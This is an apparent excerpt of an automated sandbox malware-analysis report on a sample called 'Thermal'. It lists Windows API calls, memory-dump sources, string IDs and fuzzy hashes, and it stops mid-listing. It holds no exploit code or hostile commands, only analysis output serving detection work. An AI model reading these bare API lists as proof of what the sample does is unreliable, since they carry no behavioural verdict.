                                                • Opcode Fuzzy Hash: 24f7d795f10f0f13d2818e76e9d309e50a172b9dfe6833cf912a3ae76bff7a72
                                                • Instruction Fuzzy Hash: 9721F0B1940104BEDB58ABA0EC4AEFEBB6DEF51360F50421DF925932D0DE3D4D0A9B20
                                                APIs
                                                  • Part of subcall function 00772111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
                                                  • Part of subcall function 00772111: GetStockObject.GDI32(00000011), ref: 00772163
                                                  • Part of subcall function 00772111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D
                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007F6A86
                                                • LoadLibraryW.KERNEL32(?), ref: 007F6A8D
                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007F6AA2
                                                • DestroyWindow.USER32(?), ref: 007F6AAA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                • String ID: SysAnimate32
                                                • API String ID: 4146253029-1011021900
                                                • Opcode ID: 74c5101f6c38d6dc54d7ab2c5076f664614bc402f8f7f367e6926f9c3049a0ad
                                                • Instruction ID: d44a591fbaa8a545450d22c2d4ff12bb8621d1a68fe3dd3a4e0932d43a4ff14c
                                                • Opcode Fuzzy Hash: 74c5101f6c38d6dc54d7ab2c5076f664614bc402f8f7f367e6926f9c3049a0ad
                                                • Instruction Fuzzy Hash: 57218B71200209AFEF108E689C81EBB77A9FB59324F10C619FB50A2290D739DC51AB60
                                                APIs
                                                • GetStdHandle.KERNEL32(0000000C), ref: 007D7377
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D73AA
                                                • GetStdHandle.KERNEL32(0000000C), ref: 007D73BC
                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007D73F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: 61d9a0b3d52d4f9d1568e98db24b09c331115bcc38a4722b66e79fd166381748
                                                • Instruction ID: 243fccf0defaad787e1ff41312ee3b095f6cb118e2383de91fe6fe1aa892f7fe
                                                • Opcode Fuzzy Hash: 61d9a0b3d52d4f9d1568e98db24b09c331115bcc38a4722b66e79fd166381748
                                                • Instruction Fuzzy Hash: 7421607150834AABDB249F69DC49A9A7BB4BF44720F204A1AFCA1D73E0E774D850DB90
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 007D7444
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D7476
                                                • GetStdHandle.KERNEL32(000000F6), ref: 007D7487
                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007D74C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: e1768a848a39da65903b48f03b20ac4f5ea71a677d224b23184dd492c61e006d
                                                • Instruction ID: 722adb2c05bd204612e3f505865db5f1451be7dcce47383874bf3877fedad77f
                                                • Opcode Fuzzy Hash: e1768a848a39da65903b48f03b20ac4f5ea71a677d224b23184dd492c61e006d
                                                • Instruction Fuzzy Hash: 9821C1316083469BDB259F689C49E9A7BB8BF45730F200B0AFDA0D73D0EB749840CB50
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DB297
                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007DB2EB
                                                • __swprintf.LIBCMT ref: 007DB304
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,00800980), ref: 007DB342
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                • String ID: %lu
                                                • API String ID: 3164766367-685833217
                                                • Opcode ID: 5f1ae6cb0bc2053e7e31d6d3399683ec71ec9c28e7967eb8a607798f28dba573
                                                • Instruction ID: 9de5a25b85a3a5f66c640d987f3ac263227b450c41b8531175a767f5fa29de47
                                                • Opcode Fuzzy Hash: 5f1ae6cb0bc2053e7e31d6d3399683ec71ec9c28e7967eb8a607798f28dba573
                                                • Instruction Fuzzy Hash: 3C214C34A00108EFCB10DFA5C849EAEB7B8EF89704B108069F909D7352DB35AA45DB61
                                                APIs
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                  • Part of subcall function 007CAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007CAA6F
                                                  • Part of subcall function 007CAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CAA82
                                                  • Part of subcall function 007CAA52: GetCurrentThreadId.KERNEL32 ref: 007CAA89
                                                  • Part of subcall function 007CAA52: AttachThreadInput.USER32(00000000), ref: 007CAA90
                                                • GetFocus.USER32 ref: 007CAC2A
                                                  • Part of subcall function 007CAA9B: GetParent.USER32(?), ref: 007CAAA9
                                                • GetClassNameW.USER32(?,?,00000100), ref: 007CAC73
                                                • EnumChildWindows.USER32(?,007CACEB), ref: 007CAC9B
                                                • __swprintf.LIBCMT ref: 007CACB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                • String ID: %s%d
                                                • API String ID: 1941087503-1110647743
                                                • Opcode ID: 39848d20d936fd7690aa978b11bb3f997ce34dc41046bd210e3af57bf3a4d42a
                                                • Instruction ID: d6bb4337a87dce2e43770e843b7b62ce1dae7f9623f94833ec9673dec45b823f
                                                • Opcode Fuzzy Hash: 39848d20d936fd7690aa978b11bb3f997ce34dc41046bd210e3af57bf3a4d42a
                                                • Instruction Fuzzy Hash: DA11CD75600208BBDF11BFA09D8AFAA376CAB44315F0080ADFE18AA182CA7959459B71
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 007D2318
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                • API String ID: 3964851224-769500911
                                                • Opcode ID: ba5c59a7d334c6add3b63a407c910c2fdbb9e5133222c8372b842ef4685c138d
                                                • Instruction ID: 9e6b0eafa10e2464658ebe5f0265e469944919d7d19ac5f0d6303183ace31c69
                                                • Opcode Fuzzy Hash: ba5c59a7d334c6add3b63a407c910c2fdbb9e5133222c8372b842ef4685c138d
                                                • Instruction Fuzzy Hash: 75117C30A10128DFCF04EFA4E8504EEB3B8FF25304B508069D814A7352EB3A5D5BCB90
                                                APIs
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007EF2F0
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007EF320
                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007EF453
                                                • CloseHandle.KERNEL32(?), ref: 007EF4D4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                • String ID:
                                                • API String ID: 2364364464-0
                                                • Opcode ID: 6b9536e3d3115713488ed6c88fa47d870a5de3568b0c75e05c8d39deab5e4dce
                                                • Instruction ID: 1569494d1650a4e1dd342d5c0a5046135efb8eac11458d9866dead4932646c42
                                                • Opcode Fuzzy Hash: 6b9536e3d3115713488ed6c88fa47d870a5de3568b0c75e05c8d39deab5e4dce
                                                • Instruction Fuzzy Hash: D1816071604700DFDB20EF29D886F2AB7E5AF48750F14891DFA99DB2D2D7B4AC408B91
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F075D
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F079C
                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007F07E3
                                                • RegCloseKey.ADVAPI32(?,?), ref: 007F080F
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F081C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                • String ID:
                                                • API String ID: 3440857362-0
                                                • Opcode ID: cd96a08848bed3bf8ba58464cb42b6a385b80f14333f07dbeb6c4dbf01b3d6c5
                                                • Instruction ID: 2b28f44246df45dfb5ab319df07ab67beb04705bf26f21b3e8c4404ba95fbe12
                                                • Opcode Fuzzy Hash: cd96a08848bed3bf8ba58464cb42b6a385b80f14333f07dbeb6c4dbf01b3d6c5
                                                • Instruction Fuzzy Hash: CB513A71208208EFD714EF64C885F7AB7E9BF84314F44891DF59587292DB38E905CBA2
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007DEC62
                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007DEC8B
                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007DECCA
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007DECEF
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007DECF7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                • String ID:
                                                • API String ID: 1389676194-0
                                                • Opcode ID: 9578a087a6c99c0065e0a13a4336a27c129e1dca52c92ed6b569b31ec20c18a4
                                                • Instruction ID: 47745a782b6441182ce65b878c65c152450fbc61f4775fed280ea55ae5c77306
                                                • Opcode Fuzzy Hash: 9578a087a6c99c0065e0a13a4336a27c129e1dca52c92ed6b569b31ec20c18a4
                                                • Instruction Fuzzy Hash: 2F512835A00205DFCF11EF64C989AAEBBF5EF09310B148099E949AB361CB35ED51DF60
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6dbadc64f7c2600c78b54888d38595da08cdf20591d5275fbd8414bf095c7f28
                                                • Instruction ID: 92bca60ad7cb77907a076dcf80ea93111a0ae1c1727fd0e0d5632226ad7d075d
                                                • Opcode Fuzzy Hash: 6dbadc64f7c2600c78b54888d38595da08cdf20591d5275fbd8414bf095c7f28
                                                • Instruction Fuzzy Hash: A741D3B590410CBFD720EB28CC48FB9BBB8EB09350F144165EA1AA73D1D778AD41DA61
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 00772727
                                                • ScreenToClient.USER32(008377B0,?), ref: 00772744
                                                • GetAsyncKeyState.USER32(00000001), ref: 00772769
                                                • GetAsyncKeyState.USER32(00000002), ref: 00772777
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorScreen
                                                • String ID:
                                                • API String ID: 4210589936-0
                                                • Opcode ID: 9ad642f810306af1a9b7957b6229bda6f010c19e53f37ed0c350e2cff4d95433
                                                • Instruction ID: e8f32d930b2548c437d3cbf8d47a624c97a02f7c31344c760d40d38e42d3fcc7
                                                • Opcode Fuzzy Hash: 9ad642f810306af1a9b7957b6229bda6f010c19e53f37ed0c350e2cff4d95433
                                                • Instruction Fuzzy Hash: C3418135504109FFDF1A9F68C948AE9BB74FB46364F20831AF93896291CB38AD50DF91
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 007C95E8
                                                • PostMessageW.USER32(?,00000201,00000001), ref: 007C9692
                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007C969A
                                                • PostMessageW.USER32(?,00000202,00000000), ref: 007C96A8
                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007C96B0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessagePostSleep$RectWindow
                                                • String ID:
                                                • API String ID: 3382505437-0
                                                • Opcode ID: fea025ba6f2b6a22f884fa345ede6e60df05b18e596567a11344623443418159
                                                • Instruction ID: 5892908aa650727d354f0b15a62a7e5e1fb2751d11ade372d6e8100445788e6f
                                                • Opcode Fuzzy Hash: fea025ba6f2b6a22f884fa345ede6e60df05b18e596567a11344623443418159
                                                • Instruction Fuzzy Hash: 4231BA71900219EBDB54CFA8D94CF9E7BB9FB44315F10422DFA24AB2D0C3B49924DB90
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FB804
                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007FB829
                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007FB841
                                                • GetSystemMetrics.USER32(00000004), ref: 007FB86A
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007E155C,00000000), ref: 007FB888
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$Long$MetricsSystem
                                                • String ID:
                                                • API String ID: 2294984445-0
                                                • Opcode ID: 11f751f926baba71cfc9827e319ada53f22db4f2f4fdfbf733db8101297da548
                                                • Instruction ID: 9b86ee0cecf869ae599425cc22f00192ac2024e6f30c1b3decba143642f41b4a
                                                • Opcode Fuzzy Hash: 11f751f926baba71cfc9827e319ada53f22db4f2f4fdfbf733db8101297da548
                                                • Instruction Fuzzy Hash: CF216D71914259AFCB249F39CC08B7A3BA8FB85765F244A39FA25D62E0D7349850CAD0
                                                APIs
                                                • IsWindow.USER32(00000000), ref: 007E6159
                                                • GetForegroundWindow.USER32 ref: 007E6170
                                                • GetDC.USER32(00000000), ref: 007E61AC
                                                • GetPixel.GDI32(00000000,?,00000003), ref: 007E61B8
                                                • ReleaseDC.USER32(00000000,00000003), ref: 007E61F3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$ForegroundPixelRelease
                                                • String ID:
                                                • API String ID: 4156661090-0
                                                • Opcode ID: 06c70c26dabe0965ed42b5271a7db5c5b2f30756c857b1d6715c0c68b7fded63
                                                • Instruction ID: 15e9e7b1a5a9c069b15e0281eefd54dcd1515c12b11034e825e7ae33b7cbc6c8
                                                • Opcode Fuzzy Hash: 06c70c26dabe0965ed42b5271a7db5c5b2f30756c857b1d6715c0c68b7fded63
                                                • Instruction Fuzzy Hash: 3F21A175A01604EFD750EF65DC88A9ABBF9FF98350F04C469E94A97352CB75AC00CB90
                                                APIs
                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00771729
                                                • SelectObject.GDI32(?,00000000), ref: 00771738
                                                • BeginPath.GDI32(?), ref: 0077174F
                                                • SelectObject.GDI32(?,00000000), ref: 00771778
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ObjectSelect$BeginCreatePath
                                                • String ID:
                                                • API String ID: 3225163088-0
                                                • Opcode ID: 24fe5b5bc044cdd3044ce212e21f3a395a280e080c87256f43f3c79e451a3f67
                                                • Instruction ID: 9429f1ab8a6347212ab68bf481b2696333898261f81490ac39232036a3ea0a27
                                                • Opcode Fuzzy Hash: 24fe5b5bc044cdd3044ce212e21f3a395a280e080c87256f43f3c79e451a3f67
                                                • Instruction Fuzzy Hash: F821C5B0904208EFDF209F28DC48B697BF8F780351F548626F929A61A0D779D991CF94
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: b0fd1145f580979a4e17b44b8bd0f0e5f395ffae62c85c97fee3d2af7ecebcfb
                                                • Instruction ID: adf7c88f33eeb03e156fc8002fc089dcfa2d5a6954861951d825b8a567731332
                                                • Opcode Fuzzy Hash: b0fd1145f580979a4e17b44b8bd0f0e5f395ffae62c85c97fee3d2af7ecebcfb
                                                • Instruction Fuzzy Hash: F501F963A442057BE612A1105C46FB7739CEF20354F04402DFE1AD6341FB5CDE1082E0
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 007D5075
                                                • __beginthreadex.LIBCMT ref: 007D5093
                                                • MessageBoxW.USER32(?,?,?,?), ref: 007D50A8
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007D50BE
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007D50C5
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
